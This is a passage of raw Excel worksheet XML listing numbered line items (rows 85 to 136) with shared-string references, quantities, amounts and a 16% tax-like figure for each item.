      <c r="F85" s="238" t="s">
        <v>4571</v>
      </c>
      <c r="G85" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H85" s="10">
        <v>4</v>
      </c>
      <c r="I85" s="14">
        <v>478.63</v>
      </c>
      <c r="J85" s="15">
        <v>76.5824</v>
      </c>
      <c r="K85" s="16"/>
    </row>
    <row r="86" spans="2:11">
      <c r="B86" s="9">
        <v>82</v>
      </c>
      <c r="C86" s="238" t="s">
        <v>4885</v>
      </c>
      <c r="D86" s="238" t="s">
        <v>4886</v>
      </c>
      <c r="E86" s="238" t="s">
        <v>4887</v>
      </c>
      <c r="F86" s="238" t="s">
        <v>4888</v>
      </c>
      <c r="G86" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H86" s="10">
        <v>3</v>
      </c>
      <c r="I86" s="14">
        <v>4358.98</v>
      </c>
      <c r="J86" s="15">
        <v>697.4352</v>
      </c>
      <c r="K86" s="16"/>
    </row>
    <row r="87" spans="2:11">
      <c r="B87" s="9">
        <v>83</v>
      </c>
      <c r="C87" s="238" t="s">
        <v>4889</v>
      </c>
      <c r="D87" s="238" t="s">
        <v>4890</v>
      </c>
      <c r="E87" s="238" t="s">
        <v>4891</v>
      </c>
      <c r="F87" s="9"/>
      <c r="G87" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H87" s="10">
        <v>2</v>
      </c>
      <c r="I87" s="14">
        <v>717.95</v>
      </c>
      <c r="J87" s="15">
        <v>114.8736</v>
      </c>
      <c r="K87" s="16"/>
    </row>
    <row r="88" spans="2:11">
      <c r="B88" s="9">
        <v>84</v>
      </c>
      <c r="C88" s="238" t="s">
        <v>4892</v>
      </c>
      <c r="D88" s="9"/>
      <c r="E88" s="238" t="s">
        <v>4893</v>
      </c>
      <c r="F88" s="9"/>
      <c r="G88" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H88" s="10">
        <v>4</v>
      </c>
      <c r="I88" s="14">
        <v>1230.77</v>
      </c>
      <c r="J88" s="15">
        <v>196.9216</v>
      </c>
      <c r="K88" s="16"/>
    </row>
    <row r="89" spans="2:11">
      <c r="B89" s="9">
        <v>85</v>
      </c>
      <c r="C89" s="238" t="s">
        <v>4894</v>
      </c>
      <c r="D89" s="238" t="s">
        <v>4895</v>
      </c>
      <c r="E89" s="238" t="s">
        <v>4896</v>
      </c>
      <c r="F89" s="9"/>
      <c r="G89" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H89" s="10">
        <v>1</v>
      </c>
      <c r="I89" s="14">
        <v>326.75</v>
      </c>
      <c r="J89" s="15">
        <v>52.28</v>
      </c>
      <c r="K89" s="16"/>
    </row>
    <row r="90" spans="2:11">
      <c r="B90" s="9">
        <v>86</v>
      </c>
      <c r="C90" s="238" t="s">
        <v>4897</v>
      </c>
      <c r="D90" s="238" t="s">
        <v>4898</v>
      </c>
      <c r="E90" s="238" t="s">
        <v>4899</v>
      </c>
      <c r="F90" s="9"/>
      <c r="G90" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H90" s="10">
        <v>1</v>
      </c>
      <c r="I90" s="14">
        <v>320.11</v>
      </c>
      <c r="J90" s="15">
        <v>51.2176</v>
      </c>
      <c r="K90" s="16"/>
    </row>
    <row r="91" spans="2:11">
      <c r="B91" s="9">
        <v>87</v>
      </c>
      <c r="C91" s="238" t="s">
        <v>4900</v>
      </c>
      <c r="D91" s="9"/>
      <c r="E91" s="238" t="s">
        <v>4901</v>
      </c>
      <c r="F91" s="9"/>
      <c r="G91" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H91" s="10">
        <v>4</v>
      </c>
      <c r="I91" s="14">
        <v>20.51</v>
      </c>
      <c r="J91" s="15">
        <v>3.2832</v>
      </c>
      <c r="K91" s="16"/>
    </row>
    <row r="92" spans="2:11">
      <c r="B92" s="9">
        <v>88</v>
      </c>
      <c r="C92" s="238" t="s">
        <v>4902</v>
      </c>
      <c r="D92" s="9"/>
      <c r="E92" s="238" t="s">
        <v>4903</v>
      </c>
      <c r="F92" s="9"/>
      <c r="G92" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H92" s="10">
        <v>6</v>
      </c>
      <c r="I92" s="14">
        <v>2153.85</v>
      </c>
      <c r="J92" s="15">
        <v>344.6208</v>
      </c>
      <c r="K92" s="16"/>
    </row>
    <row r="93" spans="2:11">
      <c r="B93" s="9">
        <v>89</v>
      </c>
      <c r="C93" s="238" t="s">
        <v>4904</v>
      </c>
      <c r="D93" s="238" t="s">
        <v>4905</v>
      </c>
      <c r="E93" s="238" t="s">
        <v>4906</v>
      </c>
      <c r="F93" s="9"/>
      <c r="G93" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H93" s="10">
        <v>2</v>
      </c>
      <c r="I93" s="14">
        <v>615.39</v>
      </c>
      <c r="J93" s="15">
        <v>98.464</v>
      </c>
      <c r="K93" s="16"/>
    </row>
    <row r="94" spans="2:11">
      <c r="B94" s="9">
        <v>90</v>
      </c>
      <c r="C94" s="238" t="s">
        <v>4907</v>
      </c>
      <c r="D94" s="238" t="s">
        <v>4908</v>
      </c>
      <c r="E94" s="238" t="s">
        <v>4909</v>
      </c>
      <c r="F94" s="9"/>
      <c r="G94" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H94" s="10">
        <v>98</v>
      </c>
      <c r="I94" s="14">
        <v>4400.62</v>
      </c>
      <c r="J94" s="15">
        <v>704.032</v>
      </c>
      <c r="K94" s="16"/>
    </row>
    <row r="95" spans="2:11">
      <c r="B95" s="9">
        <v>91</v>
      </c>
      <c r="C95" s="238" t="s">
        <v>4910</v>
      </c>
      <c r="D95" s="238" t="s">
        <v>4911</v>
      </c>
      <c r="E95" s="238" t="s">
        <v>4912</v>
      </c>
      <c r="F95" s="9"/>
      <c r="G95" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H95" s="10">
        <v>200</v>
      </c>
      <c r="I95" s="14">
        <v>68.38</v>
      </c>
      <c r="J95" s="15">
        <v>10.88</v>
      </c>
      <c r="K95" s="16"/>
    </row>
    <row r="96" spans="2:11">
      <c r="B96" s="9">
        <v>92</v>
      </c>
      <c r="C96" s="238" t="s">
        <v>4913</v>
      </c>
      <c r="D96" s="9"/>
      <c r="E96" s="238" t="s">
        <v>4914</v>
      </c>
      <c r="F96" s="9"/>
      <c r="G96" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H96" s="10">
        <v>1</v>
      </c>
      <c r="I96" s="14">
        <v>1367.52</v>
      </c>
      <c r="J96" s="15">
        <v>218.8032</v>
      </c>
      <c r="K96" s="16"/>
    </row>
    <row r="97" spans="2:11">
      <c r="B97" s="9">
        <v>93</v>
      </c>
      <c r="C97" s="238" t="s">
        <v>4915</v>
      </c>
      <c r="D97" s="238" t="s">
        <v>4916</v>
      </c>
      <c r="E97" s="238" t="s">
        <v>4624</v>
      </c>
      <c r="F97" s="238" t="s">
        <v>4314</v>
      </c>
      <c r="G97" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H97" s="10">
        <v>23</v>
      </c>
      <c r="I97" s="14">
        <v>5598.29</v>
      </c>
      <c r="J97" s="15">
        <v>895.712</v>
      </c>
      <c r="K97" s="16"/>
    </row>
    <row r="98" spans="2:11">
      <c r="B98" s="9">
        <v>94</v>
      </c>
      <c r="C98" s="238" t="s">
        <v>4917</v>
      </c>
      <c r="D98" s="238" t="s">
        <v>4918</v>
      </c>
      <c r="E98" s="238" t="s">
        <v>4919</v>
      </c>
      <c r="F98" s="9"/>
      <c r="G98" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H98" s="10">
        <v>3</v>
      </c>
      <c r="I98" s="14">
        <v>1847.62</v>
      </c>
      <c r="J98" s="15">
        <v>295.6176</v>
      </c>
      <c r="K98" s="16"/>
    </row>
    <row r="99" spans="2:11">
      <c r="B99" s="9">
        <v>95</v>
      </c>
      <c r="C99" s="238" t="s">
        <v>4920</v>
      </c>
      <c r="D99" s="238" t="s">
        <v>4921</v>
      </c>
      <c r="E99" s="238" t="s">
        <v>4922</v>
      </c>
      <c r="F99" s="9"/>
      <c r="G99" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H99" s="10">
        <v>7</v>
      </c>
      <c r="I99" s="14">
        <v>1794.87</v>
      </c>
      <c r="J99" s="15">
        <v>287.1792</v>
      </c>
      <c r="K99" s="16"/>
    </row>
    <row r="100" spans="2:11">
      <c r="B100" s="9">
        <v>96</v>
      </c>
      <c r="C100" s="238" t="s">
        <v>4923</v>
      </c>
      <c r="D100" s="9"/>
      <c r="E100" s="238" t="s">
        <v>4924</v>
      </c>
      <c r="F100" s="9"/>
      <c r="G100" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H100" s="10">
        <v>2</v>
      </c>
      <c r="I100" s="14">
        <v>51.28</v>
      </c>
      <c r="J100" s="15">
        <v>8.2048</v>
      </c>
      <c r="K100" s="16"/>
    </row>
    <row r="101" spans="2:11">
      <c r="B101" s="9">
        <v>97</v>
      </c>
      <c r="C101" s="238" t="s">
        <v>4925</v>
      </c>
      <c r="D101" s="9"/>
      <c r="E101" s="238" t="s">
        <v>4926</v>
      </c>
      <c r="F101" s="238" t="s">
        <v>4927</v>
      </c>
      <c r="G101" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H101" s="10">
        <v>2</v>
      </c>
      <c r="I101" s="14">
        <v>735.04</v>
      </c>
      <c r="J101" s="15">
        <v>117.6064</v>
      </c>
      <c r="K101" s="16"/>
    </row>
    <row r="102" spans="2:11">
      <c r="B102" s="9">
        <v>98</v>
      </c>
      <c r="C102" s="238" t="s">
        <v>4928</v>
      </c>
      <c r="D102" s="9"/>
      <c r="E102" s="238" t="s">
        <v>315</v>
      </c>
      <c r="F102" s="9"/>
      <c r="G102" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H102" s="10">
        <v>2</v>
      </c>
      <c r="I102" s="14">
        <v>4786.32</v>
      </c>
      <c r="J102" s="15">
        <v>765.8112</v>
      </c>
      <c r="K102" s="16"/>
    </row>
    <row r="103" spans="2:11">
      <c r="B103" s="9">
        <v>99</v>
      </c>
      <c r="C103" s="238" t="s">
        <v>4929</v>
      </c>
      <c r="D103" s="9"/>
      <c r="E103" s="238" t="s">
        <v>4930</v>
      </c>
      <c r="F103" s="238" t="s">
        <v>4931</v>
      </c>
      <c r="G103" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H103" s="10">
        <v>6</v>
      </c>
      <c r="I103" s="14">
        <v>351.29</v>
      </c>
      <c r="J103" s="15">
        <v>56.208</v>
      </c>
      <c r="K103" s="16"/>
    </row>
    <row r="104" spans="2:11">
      <c r="B104" s="9">
        <v>100</v>
      </c>
      <c r="C104" s="238" t="s">
        <v>4932</v>
      </c>
      <c r="D104" s="238" t="s">
        <v>4933</v>
      </c>
      <c r="E104" s="238" t="s">
        <v>4934</v>
      </c>
      <c r="F104" s="9"/>
      <c r="G104" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H104" s="10">
        <v>1</v>
      </c>
      <c r="I104" s="14">
        <v>324.79</v>
      </c>
      <c r="J104" s="15">
        <v>51.9664</v>
      </c>
      <c r="K104" s="16"/>
    </row>
    <row r="105" spans="2:11">
      <c r="B105" s="9">
        <v>101</v>
      </c>
      <c r="C105" s="238" t="s">
        <v>4935</v>
      </c>
      <c r="D105" s="9"/>
      <c r="E105" s="238" t="s">
        <v>4936</v>
      </c>
      <c r="F105" s="9"/>
      <c r="G105" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H105" s="10">
        <v>1</v>
      </c>
      <c r="I105" s="14">
        <v>89.46</v>
      </c>
      <c r="J105" s="15">
        <v>14.3136</v>
      </c>
      <c r="K105" s="16"/>
    </row>
    <row r="106" spans="2:11">
      <c r="B106" s="9">
        <v>102</v>
      </c>
      <c r="C106" s="238" t="s">
        <v>4937</v>
      </c>
      <c r="D106" s="238" t="s">
        <v>4938</v>
      </c>
      <c r="E106" s="238" t="s">
        <v>4939</v>
      </c>
      <c r="F106" s="238" t="s">
        <v>4682</v>
      </c>
      <c r="G106" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H106" s="10">
        <v>1</v>
      </c>
      <c r="I106" s="14">
        <v>153.85</v>
      </c>
      <c r="J106" s="15">
        <v>24.616</v>
      </c>
      <c r="K106" s="16"/>
    </row>
    <row r="107" spans="2:11">
      <c r="B107" s="9">
        <v>103</v>
      </c>
      <c r="C107" s="238" t="s">
        <v>4940</v>
      </c>
      <c r="D107" s="238" t="s">
        <v>4941</v>
      </c>
      <c r="E107" s="238" t="s">
        <v>4942</v>
      </c>
      <c r="F107" s="238" t="s">
        <v>4943</v>
      </c>
      <c r="G107" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H107" s="10">
        <v>2</v>
      </c>
      <c r="I107" s="14">
        <v>765.81</v>
      </c>
      <c r="J107" s="15">
        <v>122.5312</v>
      </c>
      <c r="K107" s="16"/>
    </row>
    <row r="108" spans="2:11">
      <c r="B108" s="9">
        <v>104</v>
      </c>
      <c r="C108" s="238" t="s">
        <v>4944</v>
      </c>
      <c r="D108" s="238" t="s">
        <v>4728</v>
      </c>
      <c r="E108" s="238" t="s">
        <v>4681</v>
      </c>
      <c r="F108" s="238" t="s">
        <v>4945</v>
      </c>
      <c r="G108" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H108" s="10">
        <v>1</v>
      </c>
      <c r="I108" s="14">
        <v>440.17</v>
      </c>
      <c r="J108" s="15">
        <v>70.4272</v>
      </c>
      <c r="K108" s="16"/>
    </row>
    <row r="109" spans="2:11">
      <c r="B109" s="9">
        <v>105</v>
      </c>
      <c r="C109" s="238" t="s">
        <v>4946</v>
      </c>
      <c r="D109" s="238" t="s">
        <v>4947</v>
      </c>
      <c r="E109" s="238" t="s">
        <v>4702</v>
      </c>
      <c r="F109" s="238" t="s">
        <v>4943</v>
      </c>
      <c r="G109" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H109" s="10">
        <v>2</v>
      </c>
      <c r="I109" s="14">
        <v>72.65</v>
      </c>
      <c r="J109" s="15">
        <v>11.6256</v>
      </c>
      <c r="K109" s="16"/>
    </row>
    <row r="110" spans="2:11">
      <c r="B110" s="9">
        <v>106</v>
      </c>
      <c r="C110" s="238" t="s">
        <v>4948</v>
      </c>
      <c r="D110" s="9"/>
      <c r="E110" s="238" t="s">
        <v>4681</v>
      </c>
      <c r="F110" s="238" t="s">
        <v>4949</v>
      </c>
      <c r="G110" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H110" s="10">
        <v>3</v>
      </c>
      <c r="I110" s="14">
        <v>648.2</v>
      </c>
      <c r="J110" s="15">
        <v>103.7136</v>
      </c>
      <c r="K110" s="16"/>
    </row>
    <row r="111" spans="2:11">
      <c r="B111" s="9">
        <v>107</v>
      </c>
      <c r="C111" s="238" t="s">
        <v>4950</v>
      </c>
      <c r="D111" s="9"/>
      <c r="E111" s="238" t="s">
        <v>4942</v>
      </c>
      <c r="F111" s="238" t="s">
        <v>4697</v>
      </c>
      <c r="G111" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H111" s="10">
        <v>3</v>
      </c>
      <c r="I111" s="14">
        <v>491.44</v>
      </c>
      <c r="J111" s="15">
        <v>78.6288</v>
      </c>
      <c r="K111" s="16"/>
    </row>
    <row r="112" spans="2:11">
      <c r="B112" s="9">
        <v>108</v>
      </c>
      <c r="C112" s="238" t="s">
        <v>4951</v>
      </c>
      <c r="D112" s="9"/>
      <c r="E112" s="238" t="s">
        <v>4952</v>
      </c>
      <c r="F112" s="238" t="s">
        <v>4949</v>
      </c>
      <c r="G112" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H112" s="10">
        <v>1</v>
      </c>
      <c r="I112" s="14">
        <v>81.2</v>
      </c>
      <c r="J112" s="15">
        <v>12.992</v>
      </c>
      <c r="K112" s="16"/>
    </row>
    <row r="113" spans="2:11">
      <c r="B113" s="9">
        <v>109</v>
      </c>
      <c r="C113" s="238" t="s">
        <v>4953</v>
      </c>
      <c r="D113" s="9"/>
      <c r="E113" s="238" t="s">
        <v>4942</v>
      </c>
      <c r="F113" s="238" t="s">
        <v>4954</v>
      </c>
      <c r="G113" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H113" s="10">
        <v>3</v>
      </c>
      <c r="I113" s="14">
        <v>1239.32</v>
      </c>
      <c r="J113" s="15">
        <v>198.2928</v>
      </c>
      <c r="K113" s="16"/>
    </row>
    <row r="114" spans="2:11">
      <c r="B114" s="9">
        <v>110</v>
      </c>
      <c r="C114" s="238" t="s">
        <v>4955</v>
      </c>
      <c r="D114" s="9"/>
      <c r="E114" s="238" t="s">
        <v>4681</v>
      </c>
      <c r="F114" s="238" t="s">
        <v>4956</v>
      </c>
      <c r="G114" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H114" s="10">
        <v>1</v>
      </c>
      <c r="I114" s="14">
        <v>307.69</v>
      </c>
      <c r="J114" s="15">
        <v>49.2304</v>
      </c>
      <c r="K114" s="16"/>
    </row>
    <row r="115" spans="2:11">
      <c r="B115" s="9">
        <v>111</v>
      </c>
      <c r="C115" s="238" t="s">
        <v>4957</v>
      </c>
      <c r="D115" s="238" t="s">
        <v>4958</v>
      </c>
      <c r="E115" s="238" t="s">
        <v>4952</v>
      </c>
      <c r="F115" s="238" t="s">
        <v>4959</v>
      </c>
      <c r="G115" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H115" s="10">
        <v>4</v>
      </c>
      <c r="I115" s="14">
        <v>1196.58</v>
      </c>
      <c r="J115" s="15">
        <v>191.456</v>
      </c>
      <c r="K115" s="16"/>
    </row>
    <row r="116" spans="2:11">
      <c r="B116" s="9">
        <v>112</v>
      </c>
      <c r="C116" s="238" t="s">
        <v>4960</v>
      </c>
      <c r="D116" s="238" t="s">
        <v>4728</v>
      </c>
      <c r="E116" s="238" t="s">
        <v>4681</v>
      </c>
      <c r="F116" s="238" t="s">
        <v>4961</v>
      </c>
      <c r="G116" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H116" s="10">
        <v>1</v>
      </c>
      <c r="I116" s="14">
        <v>40</v>
      </c>
      <c r="J116" s="15">
        <v>6.4</v>
      </c>
      <c r="K116" s="16"/>
    </row>
    <row r="117" spans="2:11">
      <c r="B117" s="9">
        <v>113</v>
      </c>
      <c r="C117" s="238" t="s">
        <v>4962</v>
      </c>
      <c r="D117" s="238" t="s">
        <v>4728</v>
      </c>
      <c r="E117" s="238" t="s">
        <v>4681</v>
      </c>
      <c r="F117" s="238" t="s">
        <v>4963</v>
      </c>
      <c r="G117" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H117" s="10">
        <v>2</v>
      </c>
      <c r="I117" s="14">
        <v>90</v>
      </c>
      <c r="J117" s="15">
        <v>14.4</v>
      </c>
      <c r="K117" s="16"/>
    </row>
    <row r="118" spans="2:11">
      <c r="B118" s="9">
        <v>114</v>
      </c>
      <c r="C118" s="238" t="s">
        <v>4964</v>
      </c>
      <c r="D118" s="238" t="s">
        <v>4965</v>
      </c>
      <c r="E118" s="238" t="s">
        <v>4952</v>
      </c>
      <c r="F118" s="238" t="s">
        <v>4966</v>
      </c>
      <c r="G118" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H118" s="10">
        <v>1</v>
      </c>
      <c r="I118" s="14">
        <v>367.52</v>
      </c>
      <c r="J118" s="15">
        <v>58.8032</v>
      </c>
      <c r="K118" s="16"/>
    </row>
    <row r="119" spans="2:11">
      <c r="B119" s="9">
        <v>115</v>
      </c>
      <c r="C119" s="238" t="s">
        <v>4967</v>
      </c>
      <c r="D119" s="238" t="s">
        <v>4968</v>
      </c>
      <c r="E119" s="238" t="s">
        <v>4681</v>
      </c>
      <c r="F119" s="238" t="s">
        <v>4966</v>
      </c>
      <c r="G119" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H119" s="10">
        <v>2</v>
      </c>
      <c r="I119" s="14">
        <v>300</v>
      </c>
      <c r="J119" s="15">
        <v>48</v>
      </c>
      <c r="K119" s="16"/>
    </row>
    <row r="120" spans="2:11">
      <c r="B120" s="9">
        <v>116</v>
      </c>
      <c r="C120" s="238" t="s">
        <v>4969</v>
      </c>
      <c r="D120" s="9"/>
      <c r="E120" s="238" t="s">
        <v>4702</v>
      </c>
      <c r="F120" s="238" t="s">
        <v>4722</v>
      </c>
      <c r="G120" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H120" s="10">
        <v>2</v>
      </c>
      <c r="I120" s="14">
        <v>34.18</v>
      </c>
      <c r="J120" s="15">
        <v>5.4688</v>
      </c>
      <c r="K120" s="16"/>
    </row>
    <row r="121" spans="2:11">
      <c r="B121" s="9">
        <v>117</v>
      </c>
      <c r="C121" s="238" t="s">
        <v>4970</v>
      </c>
      <c r="D121" s="238" t="s">
        <v>4971</v>
      </c>
      <c r="E121" s="238" t="s">
        <v>4747</v>
      </c>
      <c r="F121" s="238" t="s">
        <v>4966</v>
      </c>
      <c r="G121" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H121" s="10">
        <v>1</v>
      </c>
      <c r="I121" s="14">
        <v>15.04</v>
      </c>
      <c r="J121" s="15">
        <v>2.4064</v>
      </c>
      <c r="K121" s="16"/>
    </row>
    <row r="122" spans="2:11">
      <c r="B122" s="9">
        <v>118</v>
      </c>
      <c r="C122" s="238" t="s">
        <v>4972</v>
      </c>
      <c r="D122" s="238" t="s">
        <v>4973</v>
      </c>
      <c r="E122" s="238" t="s">
        <v>4974</v>
      </c>
      <c r="F122" s="238" t="s">
        <v>4966</v>
      </c>
      <c r="G122" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H122" s="10">
        <v>1</v>
      </c>
      <c r="I122" s="14">
        <v>10</v>
      </c>
      <c r="J122" s="15">
        <v>1.6</v>
      </c>
      <c r="K122" s="16"/>
    </row>
    <row r="123" spans="2:11">
      <c r="B123" s="9">
        <v>119</v>
      </c>
      <c r="C123" s="238" t="s">
        <v>4975</v>
      </c>
      <c r="D123" s="238" t="s">
        <v>4941</v>
      </c>
      <c r="E123" s="238" t="s">
        <v>4942</v>
      </c>
      <c r="F123" s="238" t="s">
        <v>4976</v>
      </c>
      <c r="G123" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H123" s="10">
        <v>5</v>
      </c>
      <c r="I123" s="14">
        <v>248.59</v>
      </c>
      <c r="J123" s="15">
        <v>39.776</v>
      </c>
      <c r="K123" s="16"/>
    </row>
    <row r="124" spans="2:11">
      <c r="B124" s="9">
        <v>120</v>
      </c>
      <c r="C124" s="238" t="s">
        <v>4977</v>
      </c>
      <c r="D124" s="238" t="s">
        <v>4978</v>
      </c>
      <c r="E124" s="238" t="s">
        <v>4979</v>
      </c>
      <c r="F124" s="9"/>
      <c r="G124" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H124" s="10">
        <v>7</v>
      </c>
      <c r="I124" s="14">
        <v>134.19</v>
      </c>
      <c r="J124" s="15">
        <v>21.4704</v>
      </c>
      <c r="K124" s="16"/>
    </row>
    <row r="125" spans="2:11">
      <c r="B125" s="9">
        <v>121</v>
      </c>
      <c r="C125" s="238" t="s">
        <v>4980</v>
      </c>
      <c r="D125" s="238" t="s">
        <v>4890</v>
      </c>
      <c r="E125" s="238" t="s">
        <v>4981</v>
      </c>
      <c r="F125" s="238" t="s">
        <v>4982</v>
      </c>
      <c r="G125" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H125" s="10">
        <v>3</v>
      </c>
      <c r="I125" s="14">
        <v>82.04</v>
      </c>
      <c r="J125" s="15">
        <v>13.128</v>
      </c>
      <c r="K125" s="16"/>
    </row>
    <row r="126" spans="2:11">
      <c r="B126" s="9">
        <v>122</v>
      </c>
      <c r="C126" s="238" t="s">
        <v>4983</v>
      </c>
      <c r="D126" s="238" t="s">
        <v>4941</v>
      </c>
      <c r="E126" s="238" t="s">
        <v>4942</v>
      </c>
      <c r="F126" s="238" t="s">
        <v>4982</v>
      </c>
      <c r="G126" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H126" s="10">
        <v>6</v>
      </c>
      <c r="I126" s="14">
        <v>242.18</v>
      </c>
      <c r="J126" s="15">
        <v>38.7456</v>
      </c>
      <c r="K126" s="16"/>
    </row>
    <row r="127" spans="2:11">
      <c r="B127" s="9">
        <v>123</v>
      </c>
      <c r="C127" s="238" t="s">
        <v>4984</v>
      </c>
      <c r="D127" s="9"/>
      <c r="E127" s="238" t="s">
        <v>4724</v>
      </c>
      <c r="F127" s="238" t="s">
        <v>4985</v>
      </c>
      <c r="G127" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H127" s="10">
        <v>3</v>
      </c>
      <c r="I127" s="14">
        <v>1076.92</v>
      </c>
      <c r="J127" s="15">
        <v>172.3056</v>
      </c>
      <c r="K127" s="16"/>
    </row>
    <row r="128" spans="2:11">
      <c r="B128" s="9">
        <v>124</v>
      </c>
      <c r="C128" s="238" t="s">
        <v>4986</v>
      </c>
      <c r="D128" s="238" t="s">
        <v>4987</v>
      </c>
      <c r="E128" s="238" t="s">
        <v>4681</v>
      </c>
      <c r="F128" s="238" t="s">
        <v>4988</v>
      </c>
      <c r="G128" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H128" s="10">
        <v>1</v>
      </c>
      <c r="I128" s="14">
        <v>1538.46</v>
      </c>
      <c r="J128" s="15">
        <v>246.1536</v>
      </c>
      <c r="K128" s="16"/>
    </row>
    <row r="129" spans="2:11">
      <c r="B129" s="9">
        <v>125</v>
      </c>
      <c r="C129" s="238" t="s">
        <v>4989</v>
      </c>
      <c r="D129" s="238" t="s">
        <v>4990</v>
      </c>
      <c r="E129" s="238" t="s">
        <v>4724</v>
      </c>
      <c r="F129" s="238" t="s">
        <v>4991</v>
      </c>
      <c r="G129" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H129" s="10">
        <v>4</v>
      </c>
      <c r="I129" s="14">
        <v>1196.58</v>
      </c>
      <c r="J129" s="15">
        <v>191.456</v>
      </c>
      <c r="K129" s="16"/>
    </row>
    <row r="130" spans="2:11">
      <c r="B130" s="9">
        <v>126</v>
      </c>
      <c r="C130" s="238" t="s">
        <v>4992</v>
      </c>
      <c r="D130" s="9"/>
      <c r="E130" s="238" t="s">
        <v>4981</v>
      </c>
      <c r="F130" s="238" t="s">
        <v>4988</v>
      </c>
      <c r="G130" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H130" s="10">
        <v>2</v>
      </c>
      <c r="I130" s="14">
        <v>68.38</v>
      </c>
      <c r="J130" s="15">
        <v>10.9408</v>
      </c>
      <c r="K130" s="16"/>
    </row>
    <row r="131" spans="2:11">
      <c r="B131" s="9">
        <v>127</v>
      </c>
      <c r="C131" s="238" t="s">
        <v>4993</v>
      </c>
      <c r="D131" s="9"/>
      <c r="E131" s="238" t="s">
        <v>4724</v>
      </c>
      <c r="F131" s="238" t="s">
        <v>4994</v>
      </c>
      <c r="G131" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H131" s="10">
        <v>2</v>
      </c>
      <c r="I131" s="14">
        <v>256.41</v>
      </c>
      <c r="J131" s="15">
        <v>41.0272</v>
      </c>
      <c r="K131" s="16"/>
    </row>
    <row r="132" spans="2:11">
      <c r="B132" s="9">
        <v>128</v>
      </c>
      <c r="C132" s="238" t="s">
        <v>4995</v>
      </c>
      <c r="D132" s="238" t="s">
        <v>4996</v>
      </c>
      <c r="E132" s="238" t="s">
        <v>4997</v>
      </c>
      <c r="F132" s="238" t="s">
        <v>4998</v>
      </c>
      <c r="G132" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H132" s="10">
        <v>4</v>
      </c>
      <c r="I132" s="14">
        <v>5113.64</v>
      </c>
      <c r="J132" s="15">
        <v>818.1824</v>
      </c>
      <c r="K132" s="16"/>
    </row>
    <row r="133" spans="2:11">
      <c r="B133" s="9">
        <v>129</v>
      </c>
      <c r="C133" s="238" t="s">
        <v>4999</v>
      </c>
      <c r="D133" s="238" t="s">
        <v>5000</v>
      </c>
      <c r="E133" s="238" t="s">
        <v>5001</v>
      </c>
      <c r="F133" s="238" t="s">
        <v>5002</v>
      </c>
      <c r="G133" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H133" s="10">
        <v>2</v>
      </c>
      <c r="I133" s="14">
        <v>266.66</v>
      </c>
      <c r="J133" s="15">
        <v>42.6656</v>
      </c>
      <c r="K133" s="16"/>
    </row>
    <row r="134" spans="2:11">
      <c r="B134" s="9">
        <v>130</v>
      </c>
      <c r="C134" s="238" t="s">
        <v>5003</v>
      </c>
      <c r="D134" s="238" t="s">
        <v>5004</v>
      </c>
      <c r="E134" s="238" t="s">
        <v>5005</v>
      </c>
      <c r="F134" s="238" t="s">
        <v>5002</v>
      </c>
      <c r="G134" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H134" s="10">
        <v>3</v>
      </c>
      <c r="I134" s="14">
        <v>80</v>
      </c>
      <c r="J134" s="15">
        <v>12.8016</v>
      </c>
      <c r="K134" s="16"/>
    </row>
    <row r="135" spans="2:11">
      <c r="B135" s="9">
        <v>131</v>
      </c>
      <c r="C135" s="238" t="s">
        <v>5006</v>
      </c>
      <c r="D135" s="238" t="s">
        <v>5007</v>
      </c>
      <c r="E135" s="238" t="s">
        <v>4681</v>
      </c>
      <c r="F135" s="238" t="s">
        <v>5002</v>
      </c>
      <c r="G135" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H135" s="10">
        <v>3</v>
      </c>
      <c r="I135" s="14">
        <v>320</v>
      </c>
      <c r="J135" s="15">
        <v>51.2016</v>
      </c>
      <c r="K135" s="16"/>
    </row>
    <row r="136" spans="2:11">
      <c r="B136" s="9">
        <v>132</v>
      </c>
      <c r="C136" s="238" t="s">
        <v>5008</v>
